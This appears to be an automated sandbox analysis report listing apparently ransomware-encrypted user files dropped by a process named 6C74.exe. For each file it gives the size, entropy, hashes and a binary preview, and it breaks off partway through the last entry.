Preview:	GLTYD.TD...g9jirwf....]b..t.s.........+r.......o.-....X....k@.....?x...........).u!.}.O'..g....;.......8.N(..ZI.../.W.`./.T.<..e.!L.#.....:.,...k..:...."..v.R...^6w..o$u"......Q.....d...i\..y..?P...+{T..1./o......F.2...6....E..~.Z.H@..G.{...o. c.$...fJh`i4.....L.?....a.H-k..MS8.r..Ah.z..)b?F...3...h..Y.<=+..hy.9U.1.. .....b.....@...M....4.....y._.s..\|..?1....7.<\=.s..f....T"..qk&C...'.@R.#...i#G...~]U..o.+....:.._..'.bx..............%^8].......uz.\|.%.s .......6'Y\.....\...6..`Y...H.yu.W.#.1.e.Ur0..K.Kh...)<..e.QN......sX....6.z...X.l.}..4..>...t..`...I{.W.(bK...e].'Y.".w..T.q3....$&J.....R3(..Zu.....%1.....b.L8iQan...].Q..w..F......h....Q4.....!~:MZ~.g]....(.0...P......8....>.,.K.......Q.........V_..T..I..j.bx+.g......}Uw....FoYU~Rh.).{..W.^..j.6S1-.C...O..d....+.,.....;.&.....J...9..ik)I.f...d....-..V.Wy].[s....(..H..~ .s..3./.......\....&.x$..A..4..q.~G...s.w.,....F`..7)>...b...-...dj.7...\|...............hs9.`.V<.....

C:\Users\user\Desktop\GLTYDMDUST.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8425782203574474
Encrypted:	false
SSDEEP:	24:rKUOQI0L2in3maaTRgNdvgEnfra/sv3p+hUkD8JzBPoJWbD:rKUK0L2i36tgPvvfrh/zHD
MD5:	C5E3E253BB162752C5C35DA4304983DA
SHA1:	29729A6B320F56D3CD8ADF47C1ADD85F1638495D
SHA-256:	69487D9DA4704967C0A7F991264C118B2649766D075B4A3C4299EE4D4C10B638
SHA-512:	B7C82117DFE07F50288866B3B57E948B4471F5A541B8D1E33292C067FF9B1982615DADE480D32E420D1766D2A901FC1A9387B83B487CADE6A7B6BD63C9194218
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.N.&..1~5.b..lS...)..W.5.?&.>..r...oU3.s.SU.+.E............V..$HF..FzA.!.O..PB..n\...D.d0#.9..n+.J7..E;...=4..T\.&S<...T...gV..r...i[.'3.r.bv-.........i..U.;XK?..=.\|.j...>..ow9=_. d...Z6.....{.>X3P.SC...g}.[`........cg>.#VW..7.A.?.MH..a..q!..M..>.7.l.Hh..:....6e....Y..L...H..6F?).6.\....U\|....`...<.1..3.....X8...,.].(.....c..?%..T...kh.GWm..........9.S.B..... K.4.v.........W.co..3T.aYw.3'./....KQ....._'..S:..[......^B\|.Z0.aw.y4.;....7.wJ..H.<p5.Q:.NQY.z@......$#.\|..w.N@..99{...w ]... .y.$>{..q\]1....G\|....D^W.%....iEz....I....4.lB..z..5..t.9....~]$.K.x.p.g..Z.....~.p.0../Sc.....m.HM[0C.7/r.......z.B....T..e...k..0`.....a~.%T......(.9..MX.>@a...J..x-F..t...{..n7.qx....e`Y1..]E.&.D....X.Fp.%..Uj0.c...................8c.U.l....\|A.......B9.GrK.>X.)RF..f5.y.f....VJ.{.8..:q0j....M}..q;....._U.sw;...J..........w..._w/'.k.q>.q..C..t.;...wX.$....M.9q.........+..S....h...AmZ..7.y..4.-.<D#.,..A....k..c.J.Ht.......m......?.#l..?~..zx

C:\Users\user\Desktop\GLTYDMDUST.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8425782203574474
Encrypted:	false
SSDEEP:	24:rKUOQI0L2in3maaTRgNdvgEnfra/sv3p+hUkD8JzBPoJWbD:rKUK0L2i36tgPvvfrh/zHD
MD5:	C5E3E253BB162752C5C35DA4304983DA
SHA1:	29729A6B320F56D3CD8ADF47C1ADD85F1638495D
SHA-256:	69487D9DA4704967C0A7F991264C118B2649766D075B4A3C4299EE4D4C10B638
SHA-512:	B7C82117DFE07F50288866B3B57E948B4471F5A541B8D1E33292C067FF9B1982615DADE480D32E420D1766D2A901FC1A9387B83B487CADE6A7B6BD63C9194218
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.N.&..1~5.b..lS...)..W.5.?&.>..r...oU3.s.SU.+.E............V..$HF..FzA.!.O..PB..n\...D.d0#.9..n+.J7..E;...=4..T\.&S<...T...gV..r...i[.'3.r.bv-.........i..U.;XK?..=.\|.j...>..ow9=_. d...Z6.....{.>X3P.SC...g}.[`........cg>.#VW..7.A.?.MH..a..q!..M..>.7.l.Hh..:....6e....Y..L...H..6F?).6.\....U\|....`...<.1..3.....X8...,.].(.....c..?%..T...kh.GWm..........9.S.B..... K.4.v.........W.co..3T.aYw.3'./....KQ....._'..S:..[......^B\|.Z0.aw.y4.;....7.wJ..H.<p5.Q:.NQY.z@......$#.\|..w.N@..99{...w ]... .y.$>{..q\]1....G\|....D^W.%....iEz....I....4.lB..z..5..t.9....~]$.K.x.p.g..Z.....~.p.0../Sc.....m.HM[0C.7/r.......z.B....T..e...k..0`.....a~.%T......(.9..MX.>@a...J..x-F..t...{..n7.qx....e`Y1..]E.&.D....X.Fp.%..Uj0.c...................8c.U.l....\|A.......B9.GrK.>X.)RF..f5.y.f....VJ.{.8..:q0j....M}..q;....._U.sw;...J..........w..._w/'.k.q>.q..C..t.;...wX.$....M.9q.........+..S....h...AmZ..7.y..4.-.<D#.,..A....k..c.J.Ht.......m......?.#l..?~..zx

C:\Users\user\Desktop\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825120422789058
Encrypted:	false
SSDEEP:	24:QeXE/XD2Zp6Yrv/2utSIgVBJnfyFeSnvUEcO41ZOgIybmLoNeHYOLLPWbD:QeUv63jrv/2utStJfYEO41MdLoCFLLcD
MD5:	E98429B049E9B767D1EF719EEA2ADC4A
SHA1:	F03349465B46AA214D56E17800DDCFC11536D6F3
SHA-256:	3FADBCA29EE1A43C27DB491C0D3A524B7EC12EC74CEC03A5316CB748D187DE22
SHA-512:	D843A12C80E199F001F5537D48F08DD249E3D964A2928F72029763BEA0B55BAEBF3B32A9D78BF4CBE9F3451FFC3EDDE7492FA6AF8F5AA3A4ED3967D210981F26
Malicious:	false
Reputation:	unknown
Preview:	GLTYD7&...0[....D.....BA.L..[.....P..{....r~]...D{W.....]^.9....w..s.,.#MyN.-E..<..P.]3..1!2.W..m..W.eV._Rvz....L.5..=.q_%..u..;...KN\|.&z....o.B...<...G.......Q..e.....u......G'[..DV.......r.T.0.n.,06xn........1.`g..(.e.`.z/LB.\.``.M..&.....pV\....3..W]....a#...7.e....w...t.P[......h...o.x....HCI..T....i..m...{.?1...{u{..........._..\}\5...S~..Z.c..-v....b...\|.n..~>o...j..=....4,.TZ.5.9. ./.3.\.....e]}..!...-..,-X.....f.m.[.U.5}.....jmP..v.w}.ky..#.~./..[mD2..).`[Q...y..Zw.<QF.....%.........x;3.I.=g..>.s..k&N.........T.cO}..I..F.....z}..A...q&..G.6Z.I.D.c.QJMI.O&....7..'..^/a.9K....7...7....g.r}.<.$....1.$V7...nG..",<..U...~&.d..Y..W.._\...........l.....@m..:%...E.6e..c.]5=..\|...]"...q6+(....sj......PJ&.HM.[^x....#zB.z)rTk.:KJ....a.....Ob.{HS./...>...p...j....s)...,.U..[........M.-..1..s.b.M....r.6...69..M=~.Yu.Bx..6O.\|n.0..fJ3.>t=..xZh...UQ.......lM....\|..,.z.._HqH.rz.2..B[....;-<..#x<(.....,-...}..+Or..I....EHmDY..4.........

C:\Users\user\Desktop\GLTYDMDUST.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825120422789058
Encrypted:	false
SSDEEP:	24:QeXE/XD2Zp6Yrv/2utSIgVBJnfyFeSnvUEcO41ZOgIybmLoNeHYOLLPWbD:QeUv63jrv/2utStJfYEO41MdLoCFLLcD
MD5:	E98429B049E9B767D1EF719EEA2ADC4A
SHA1:	F03349465B46AA214D56E17800DDCFC11536D6F3
SHA-256:	3FADBCA29EE1A43C27DB491C0D3A524B7EC12EC74CEC03A5316CB748D187DE22
SHA-512:	D843A12C80E199F001F5537D48F08DD249E3D964A2928F72029763BEA0B55BAEBF3B32A9D78BF4CBE9F3451FFC3EDDE7492FA6AF8F5AA3A4ED3967D210981F26
Malicious:	false
Reputation:	unknown
Preview:	GLTYD7&...0[....D.....BA.L..[.....P..{....r~]...D{W.....]^.9....w..s.,.#MyN.-E..<..P.]3..1!2.W..m..W.eV._Rvz....L.5..=.q_%..u..;...KN\|.&z....o.B...<...G.......Q..e.....u......G'[..DV.......r.T.0.n.,06xn........1.`g..(.e.`.z/LB.\.``.M..&.....pV\....3..W]....a#...7.e....w...t.P[......h...o.x....HCI..T....i..m...{.?1...{u{..........._..\}\5...S~..Z.c..-v....b...\|.n..~>o...j..=....4,.TZ.5.9. ./.3.\.....e]}..!...-..,-X.....f.m.[.U.5}.....jmP..v.w}.ky..#.~./..[mD2..).`[Q...y..Zw.<QF.....%.........x;3.I.=g..>.s..k&N.........T.cO}..I..F.....z}..A...q&..G.6Z.I.D.c.QJMI.O&....7..'..^/a.9K....7...7....g.r}.<.$....1.$V7...nG..",<..U...~&.d..Y..W.._\...........l.....@m..:%...E.6e..c.]5=..\|...]"...q6+(....sj......PJ&.HM.[^x....#zB.z)rTk.:KJ....a.....Ob.{HS./...>...p...j....s)...,.U..[........M.-..1..s.b.M....r.6...69..M=~.Yu.Bx..6O.\|n.0..fJ3.>t=..xZh...UQ.......lM....\|..,.z.._HqH.rz.2..B[....;-<..#x<(.....,-...}..+Or..I....EHmDY..4.........

C:\Users\user\Desktop\GNLQNHOLWB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862315293769421
Encrypted:	false
SSDEEP:	24:Zibk8kvsKLvj2QTWAkHXYTUO8OPGd2bLM2Gutmty5AJgSXPjG8D57J9uDJWbD:ZzU4j0z/aPGdTPuUtjfjjJ9MWD
MD5:	CE09AE27EB37631E714A9CF227DD4B5A
SHA1:	C20162AC18ABF710A9E4B312F6AEF609CE21AD51
SHA-256:	BD749A70E09AAA21E8F338C2258DCFA4BA2E7D35F4611E65FD2307F3A7D6885F
SHA-512:	AAEDDA6D02AEB63489423BDCF753FF1FB211D479AB07AD99ACD25159424DF08A79F6CC2BBB8CB1C971057BF1B723B1BB062F9412556250A3AFFC9FF628494947
Malicious:	false
Reputation:	unknown
Preview:	GNLQN.e...W...;......{.b4...j...x..5U\|c..$.opd..]s.+..eZ.....#..X..T`@...j.i.u....... V0.Pm[..c6...~.no.B....&..;y.WK........".....De..-...2b\#.....6r.0 3....6kG/-.\..\|....C...Sdl...'..cn..T.....$.}..du..8V..W.t.e.....BW,_f.0.......N-e.9.. .G.,.......)...t.s.!@.F.\|....x..../@..bJ....w.Dsuls.Z...E..>..'i.zN4..K.I...5.\p.#J..t..B......7'G...:....Y..V..M(..O7Mq...J..yGc.d..p ...K.6{...8....z.I9..<.G?...c.r..-v..N..R.X..q....4i.#.w..i..^G..i...........h..........mI...Tu@.U..X..wx.s.j.d...w.kT...Y.#.V...[8..D....A$....V...s...M..Q]./.:iV/./[3/....d.E.....]..(..c.M....._...Z.G.U..U.`./...O.@[...6-..0Sy.G....T.P.t.x.&........B....j.D..U..a.Q.Z..O..(.:..7{..g.5.."...#.\..^CB...<.sa....y..5QF~......<..X.q.u....Y..!(OC...W....S.PP.....j.[..K.P..:)3.N....!R."3#..d.y./.]/.GC..,..f.........U.........^....N..H$Ko9Y..d.......j....3..;BR.].)......L.8.Z.k.b.......r"f......`&e.....V.j.=>.?/.N.,.z9+........T..!d.Lr..".....ykN.I......VH@;.c..1Z..i.zw...>. ou(.d

C:\Users\user\Desktop\GNLQNHOLWB.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862315293769421
Encrypted:	false
SSDEEP:	24:Zibk8kvsKLvj2QTWAkHXYTUO8OPGd2bLM2Gutmty5AJgSXPjG8D57J9uDJWbD:ZzU4j0z/aPGdTPuUtjfjjJ9MWD
MD5:	CE09AE27EB37631E714A9CF227DD4B5A
SHA1:	C20162AC18ABF710A9E4B312F6AEF609CE21AD51
SHA-256:	BD749A70E09AAA21E8F338C2258DCFA4BA2E7D35F4611E65FD2307F3A7D6885F
SHA-512:	AAEDDA6D02AEB63489423BDCF753FF1FB211D479AB07AD99ACD25159424DF08A79F6CC2BBB8CB1C971057BF1B723B1BB062F9412556250A3AFFC9FF628494947
Malicious:	false
Reputation:	unknown
Preview:	GNLQN.e...W...;......{.b4...j...x..5U\|c..$.opd..]s.+..eZ.....#..X..T`@...j.i.u....... V0.Pm[..c6...~.no.B....&..;y.WK........".....De..-...2b\#.....6r.0 3....6kG/-.\..\|....C...Sdl...'..cn..T.....$.}..du..8V..W.t.e.....BW,_f.0.......N-e.9.. .G.,.......)...t.s.!@.F.\|....x..../@..bJ....w.Dsuls.Z...E..>..'i.zN4..K.I...5.\p.#J..t..B......7'G...:....Y..V..M(..O7Mq...J..yGc.d..p ...K.6{...8....z.I9..<.G?...c.r..-v..N..R.X..q....4i.#.w..i..^G..i...........h..........mI...Tu@.U..X..wx.s.j.d...w.kT...Y.#.V...[8..D....A$....V...s...M..Q]./.:iV/./[3/....d.E.....]..(..c.M....._...Z.G.U..U.`./...O.@[...6-..0Sy.G....T.P.t.x.&........B....j.D..U..a.Q.Z..O..(.:..7{..g.5.."...#.\..^CB...<.sa....y..5QF~......<..X.q.u....Y..!(OC...W....S.PP.....j.[..K.P..:)3.N....!R."3#..d.y./.]/.GC..,..f.........U.........^....N..H$Ko9Y..d.......j....3..;BR.].)......L.8.Z.k.b.......r"f......`&e.....V.j.=>.?/.N.,.z9+........T..!d.Lr..".....ykN.I......VH@;.c..1Z..i.zw...>. ou(.d

C:\Users\user\Desktop\HMPPSXQPQV.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84884030446043
Encrypted:	false
SSDEEP:	24:RP5TvBVHM2c2G/4QBv1XI/1JOG7Fnd2wjrCRAtY9Q6MAF8vZs2ldTorq+xJWbD:p5TvBVHTpZQ3AOG7jbY9jMAF8viQEpxO
MD5:	8BFEA55C427A7234E0EC8DFA3126AE63
SHA1:	F3C2C434C35A82114C7F8988796D9DF030356B39
SHA-256:	0B8498DDB9E748ED14794C84F3709D5111A454FB76A4F3D5266845CDBA9F9F26
SHA-512:	1F953DC96A93405A6D15355F4811F9BC15DE0F75FDCA028A3A9ADAAAFF46CA7664E0F6B250513477426ADC0B1D4A470B89D089972F89B21077274318AB024BF8
Malicious:	true
Reputation:	unknown
Preview:	HMPPS.omL.k...:l....3!....:.j...G.;.....#J._.Ke._}'....}..^.....\|2X..j..V....L-.+.K.YJ\....w.....c...:E9U:`'..o..g..}..[w............\..L#<........2.\|.j..2.^..U!...t....r...Z.j./......V......;...+a'...6.(s7....e.....G.....sSw.%.~.......W..ql.....g8za.w...}.w.....h.>.~..c.aL...@...Qj.e8.....z.\.D...$.....Tf.<..WJ......8.s^xS._8.8..,......g<..7..T.._.79..S..q..R.An......Y+...{f.vIO.da..\|g.lKi.`l...cl..Vu.....ll.\|<..,...@&..7. ..V.,.p...~.0.#5......K=T. ..F~.\......>.............Y..Z.V6$..q..Vv......K`.G...pkA'....^.......T.)....6..L.n..G.+..d..FP........../.W-I(&8..}.^..0..=IW.!.c.1;^..\e...e.=........k.Z..TO..I....\.{...N=.!..;.%...T.B.D...\|.B..zHE..\|a.;D..g..}6..$1....R..sD....M.}._..Z....6"...k.t...>..7.....8.I....'.CA...sm.7.....@8L<I...!.k.@K...)yu...E.+).1.U#.].F.Hu>M...tD..5.Q..m..%...uI...%.^r%.v.1..U..hB.P.&i.....&....u^y.u[..18..O......2..._.Y.yq.s.u....qx..wv..p!}.p.q..d$..]....e../.j.....7......C.s...+..+2h$.~.6O.q)..Fw.

C:\Users\user\Desktop\HMPPSXQPQV.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84884030446043
Encrypted:	false
SSDEEP:	24:RP5TvBVHM2c2G/4QBv1XI/1JOG7Fnd2wjrCRAtY9Q6MAF8vZs2ldTorq+xJWbD:p5TvBVHTpZQ3AOG7jbY9jMAF8viQEpxO
MD5:	8BFEA55C427A7234E0EC8DFA3126AE63
SHA1:	F3C2C434C35A82114C7F8988796D9DF030356B39
SHA-256:	0B8498DDB9E748ED14794C84F3709D5111A454FB76A4F3D5266845CDBA9F9F26
SHA-512:	1F953DC96A93405A6D15355F4811F9BC15DE0F75FDCA028A3A9ADAAAFF46CA7664E0F6B250513477426ADC0B1D4A470B89D089972F89B21077274318AB024BF8
Malicious:	false
Reputation:	unknown
Preview:	HMPPS.omL.k...:l....3!....:.j...G.;.....#J._.Ke._}'....}..^.....\|2X..j..V....L-.+.K.YJ\....w.....c...:E9U:`'..o..g..}..[w............\..L#<........2.\|.j..2.^..U!...t....r...Z.j./......V......;...+a'...6.(s7....e.....G.....sSw.%.~.......W..ql.....g8za.w...}.w.....h.>.~..c.aL...@...Qj.e8.....z.\.D...$.....Tf.<..WJ......8.s^xS._8.8..,......g<..7..T.._.79..S..q..R.An......Y+...{f.vIO.da..\|g.lKi.`l...cl..Vu.....ll.\|<..,...@&..7. ..V.,.p...~.0.#5......K=T. ..F~.\......>.............Y..Z.V6$..q..Vv......K`.G...pkA'....^.......T.)....6..L.n..G.+..d..FP........../.W-I(&8..}.^..0..=IW.!.c.1;^..\e...e.=........k.Z..TO..I....\.{...N=.!..;.%...T.B.D...\|.B..zHE..\|a.;D..g..}6..$1....R..sD....M.}._..Z....6"...k.t...>..7.....8.I....'.CA...sm.7.....@8L<I...!.k.@K...)yu...E.+).1.U#.].F.Hu>M...tD..5.Q..m..%...uI...%.^r%.v.1..U..hB.P.&i.....&....u^y.u[..18..O......2..._.Y.yq.s.u....qx..wv..p!}.p.q..d$..]....e../.j.....7......C.s...+..+2h$.~.6O.q)..Fw.

C:\Users\user\Desktop\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863246628726485
Encrypted:	false
SSDEEP:	24:J5W4fxzsFCpzgnLBYJjLHBRKigB2OaIxwwmd2XyJJeXWsZZ80Ug9PWbD:DW6iNYDnHFwa2XyJ3vD
MD5:	31FB46B3FBFE8EE18E30893ED990865E
SHA1:	171EEDA82446BD40335E2F869AD25A3D5713F7FE
SHA-256:	452274471DBCFA951A50F611B17F115D5FDD504B4C02B0C84014D974F938DE2C
SHA-512:	1B8D225F5DE1B02366B69278D6B7548995694370E2B19C68A36FB4BAB200C80CEB13841850DCD327C573AB5435D002557901DED7466D7600FCBC715EEC111C37
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.5.......Y.....'.>.V,..O...4 ..7=y..wY.9U?~v./.&.?.\|...A...s.p.-6.;5.n...c....6...u......]...2.F.E..M>^p.h...W..Kq...N>?.....t.t%.X.....AT.!.\|[....dJ39.u./...g..U.i..=Fq.ij...c...N_...D.8....Jz^...}P.4...o......cB.#.C...b.P...L...Wm...X.'.\..w..j.g.QE....v;..M$.."-."q.S.0t...1.#A.zy..wU6.&7..,B.%.L......g.7xK.....o8.f.._@.6.......]q.....x.94P..OI.....<.!..rf..8..P..'\"D..j..I....[4/..?10`D.S.C....c1. .....H.....z.b...~+.!.-V.....2.7..'h..Oj.".=...y..A..S.~.......6".Y2.8Q..:a...h...vF..t.z..GS.....-.[...5.<W.....a..A..........euR.......h.....P.....Q`.....k..>.t.#2.Q.Kj6.T-P+3...!2.uy\z.m......YA.....0gt]. .eb...h..@...W".$...a...V.C...8.4?D.m*u...~D\..X<.....F....8.\....!8..?.%A8..K\N}sT.d......u..^.....I..&X.s..{..<.)...p.m.`.h...V.M..O:.r.....{...!.=....R.E2......Ao....V.z.CM.O."....b...+....7..H<..n.'._..v.B.j..'.....%...aW..X.....a..).....(.D\|T.C.l.....!.U...Q.lXQ.....10..:9...6.q.Q....p......=#X......o.E..m.V.mM...].........8,xW

C:\Users\user\Desktop\HQJBRDYKDE.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863246628726485
Encrypted:	false
SSDEEP:	24:J5W4fxzsFCpzgnLBYJjLHBRKigB2OaIxwwmd2XyJJeXWsZZ80Ug9PWbD:DW6iNYDnHFwa2XyJ3vD
MD5:	31FB46B3FBFE8EE18E30893ED990865E
SHA1:	171EEDA82446BD40335E2F869AD25A3D5713F7FE
SHA-256:	452274471DBCFA951A50F611B17F115D5FDD504B4C02B0C84014D974F938DE2C
SHA-512:	1B8D225F5DE1B02366B69278D6B7548995694370E2B19C68A36FB4BAB200C80CEB13841850DCD327C573AB5435D002557901DED7466D7600FCBC715EEC111C37
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.5.......Y.....'.>.V,..O...4 ..7=y..wY.9U?~v./.&.?.\|...A...s.p.-6.;5.n...c....6...u......]...2.F.E..M>^p.h...W..Kq...N>?.....t.t%.X.....AT.!.\|[....dJ39.u./...g..U.i..=Fq.ij...c...N_...D.8....Jz^...}P.4...o......cB.#.C...b.P...L...Wm...X.'.\..w..j.g.QE....v;..M$.."-."q.S.0t...1.#A.zy..wU6.&7..,B.%.L......g.7xK.....o8.f.._@.6.......]q.....x.94P..OI.....<.!..rf..8..P..'\"D..j..I....[4/..?10`D.S.C....c1. .....H.....z.b...~+.!.-V.....2.7..'h..Oj.".=...y..A..S.~.......6".Y2.8Q..:a...h...vF..t.z..GS.....-.[...5.<W.....a..A..........euR.......h.....P.....Q`.....k..>.t.#2.Q.Kj6.T-P+3...!2.uy\z.m......YA.....0gt]. .eb...h..@...W".$...a...V.C...8.4?D.m*u...~D\..X<.....F....8.\....!8..?.%A8..K\N}sT.d......u..^.....I..&X.s..{..<.)...p.m.`.h...V.M..O:.r.....{...!.=....R.E2......Ao....V.z.CM.O."....b...+....7..H<..n.'._..v.B.j..'.....%...aW..X.....a..).....(.D\|T.C.l.....!.U...Q.lXQ.....10..:9...6.q.Q....p......=#X......o.E..m.V.mM...].........8,xW

C:\Users\user\Desktop\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840844674381614
Encrypted:	false
SSDEEP:	24:3N+dG2iwEq+UcNElXxeH6AY6cFlVxclZav9LusNPY9q1s7xjgZ14WbD:3Noi/qPcevHhPIa1Lrm9dgZ19D
MD5:	AEDF0E55A076D505FA3B85E05EE27E96
SHA1:	304EE74C9DB194F81F6FE8960D00876DD0A5989D
SHA-256:	AD734F7A8C3F27351DBFD6D628ECE277BB361542AC4CD412D95631E823FDE646
SHA-512:	70C34B801B60DCCB09515338C6C41996678FC9AE6C272A21A48B50770A41E273D357E1C48B8D14D7E81DE40E3AF85EF9F3E3D3D2AEC2C04AF2DECE06D8478769
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.6.0.\|.....&4..P\|ZKS....\|.xO..Ot.~@..2..P..>.C....7...9..!.$.D......i'...{IN.......+...n 4..&TV"+..B9..#b..v.%.2.yI~..C.} K.zs..j.7..L..m.....}krw9..9..9..?..P.....S....q./../.G8t..P..k..N.q....&.).........A..[..`o&]O..6..rh.....\........u..}L..Hy.".."r..=}V.k.3..ZKwB..y.Q....8....#I..Yr.&.W2l.....&.......l....o.......)..(5.J.H.VW%..=,....u.Wq.Ap9...T...}.f2=.....fT&.D......(..Z2[..p.[.cZ. )\;.&..#......\|.z.P!.}q.:g.-....X..f...,P.-..L[l....\|{:up.JI.cg.....R...NUG...._n&.........0.... ......#.J...#.....;I....j,..+xc/...\9......J.....6.~ ..P...%H.}..O.m.......8.&.(j.A...,].......\|(.o...a...k.W4.Pf...*/..O>..[..Q\y..&Z...&.......J...BO.z.........'.34z:.sP.+^b2.,l.Q.r.F..5...q...:.D..6....-...#..v.f......[..u.j)=g..{..@Hp..syZ.......h....WO./....l.Ri.oi..k.Jd.eA.o...O..U..3.[.]..%.....E....l..Z..........S.:.nH..-..e..N.Y8.m.%.B.I.A.@.f....V....T.#.&.....,....!...ilz....4>..^..p.4.y.6..+.^.....G..5.LA.`h"J...../.QEj...@X!

C:\Users\user\Desktop\LFOPODGVOH.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840844674381614
Encrypted:	false
SSDEEP:	24:3N+dG2iwEq+UcNElXxeH6AY6cFlVxclZav9LusNPY9q1s7xjgZ14WbD:3Noi/qPcevHhPIa1Lrm9dgZ19D
MD5:	AEDF0E55A076D505FA3B85E05EE27E96
SHA1:	304EE74C9DB194F81F6FE8960D00876DD0A5989D
SHA-256:	AD734F7A8C3F27351DBFD6D628ECE277BB361542AC4CD412D95631E823FDE646
SHA-512:	70C34B801B60DCCB09515338C6C41996678FC9AE6C272A21A48B50770A41E273D357E1C48B8D14D7E81DE40E3AF85EF9F3E3D3D2AEC2C04AF2DECE06D8478769
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.6.0.\|.....&4..P\|ZKS....\|.xO..Ot.~@..2..P..>.C....7...9..!.$.D......i'...{IN.......+...n 4..&TV"+..B9..#b..v.%.2.yI~..C.} K.zs..j.7..L..m.....}krw9..9..9..?..P.....S....q./../.G8t..P..k..N.q....&.).........A..[..`o&]O..6..rh.....\........u..}L..Hy.".."r..=}V.k.3..ZKwB..y.Q....8....#I..Yr.&.W2l.....&.......l....o.......)..(5.J.H.VW%..=,....u.Wq.Ap9...T...}.f2=.....fT&.D......(..Z2[..p.[.cZ. )\;.&..#......\|.z.P!.}q.:g.-....X..f...,P.-..L[l....\|{:up.JI.cg.....R...NUG...._n&.........0.... ......#.J...#.....;I....j,..+xc/...\9......J.....6.~ ..P...%H.}..O.m.......8.&.(j.A...,].......\|(.o...a...k.W4.Pf...*/..O>..[..Q\y..&Z...&.......J...BO.z.........'.34z:.sP.+^b2.,l.Q.r.F..5...q...:.D..6....-...#..v.f......[..u.j)=g..{..@Hp..syZ.......h....WO./....l.Ri.oi..k.Jd.eA.o...O..U..3.[.]..%.....E....l..Z..........S.:.nH..-..e..N.Y8.m.%.B.I.A.@.f....V....T.#.&.....,....!...ilz....4>..^..p.4.y.6..+.^.....G..5.LA.`h"J...../.QEj...@X!

C:\Users\user\Desktop\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830372119438626
Encrypted:	false
SSDEEP:	24:gvKKZ2H4YhBWGa6QCnfH35+z0+norF0gSZdmUnC8xZR+NBhqKeu2DeIUIWbD:gCKSPa6PnfHZ+orFMDnC8rMNvF6eIUND
MD5:	1BDD64FEE02638072F743B245CA7D517
SHA1:	E71930957D5782CA0F51A8A6F614496C5A6F79E6
SHA-256:	176EC6E95EEE012092F8DD3D73C09E5DF3CB61E9B9C776FC756173B49F42C6B5
SHA-512:	7CFB1C579678BB424918AC32BDB908064B2D223576A8729A9B1DA107978F96C98A6A20C52F2727D54DF89AA1C98277AC70D686475353FCE5A60304D40BD36F14
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.Zy....xt.&.S...........K...5..T..Yp.n....E;..".r.3.`(..;..R.6..B.....%b#!66.,"\|;qe.;..ff...........%#i.T....Bz.S.]i..U..u.s.8..]....?m.c...@.4DR.M}.T..fB...}TG...o.T.O.8...eb+'..9..D..."......r;..B.......g.d4....Y..}4........`..../.1).....b&.......Rj..4.TM..0.z..o..}....uh.~...C.<^-. _w?t3\..P...y................=n.S.,.~r:f..\.6x.A...4Z4.92.....8..t9\S.$.K....."....)...]....$..3....k.B.r..w.l.w...#)7 .U.^..]..~fd..Y..@q/#.Px...Q.k..p.Q.[6...._83.7.`...V[F....... W\_...NX.J.`b.....\|....g..P..Y"......N.y8KM.zl%x.#Z..:..,....M...N.ML8&.;.p.Pf....R2$\|.e..\6..oDd?qR..Y..2.W....u.i.3+.Z..,..5...u........]....aQm..0..y.7@.S]INT...j_.0V.4KR.l..../@f.Z...Pui=.L...L<.;.b../..S"d...M.v.%...i..R....L...5.KsgSF..*...a..+7..\.N..\G8i.Sm9...O.._4h....H.>"..."V......Iv....}3H....D.13...9pe.9..rCr.....]].Y+.O..,..:.b..p(..^....^?.`.~..s.S..+.P_.f..0..L.N.0..x.`.....K.....Y...#G;.O.....A1....m........~..(JA......j..v.....e./&vG.\.'7..\.7G...:D>.>"w

C:\Users\user\Desktop\LFOPODGVOH.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830372119438626
Encrypted:	false
SSDEEP:	24:gvKKZ2H4YhBWGa6QCnfH35+z0+norF0gSZdmUnC8xZR+NBhqKeu2DeIUIWbD:gCKSPa6PnfHZ+orFMDnC8rMNvF6eIUND
MD5:	1BDD64FEE02638072F743B245CA7D517
SHA1:	E71930957D5782CA0F51A8A6F614496C5A6F79E6
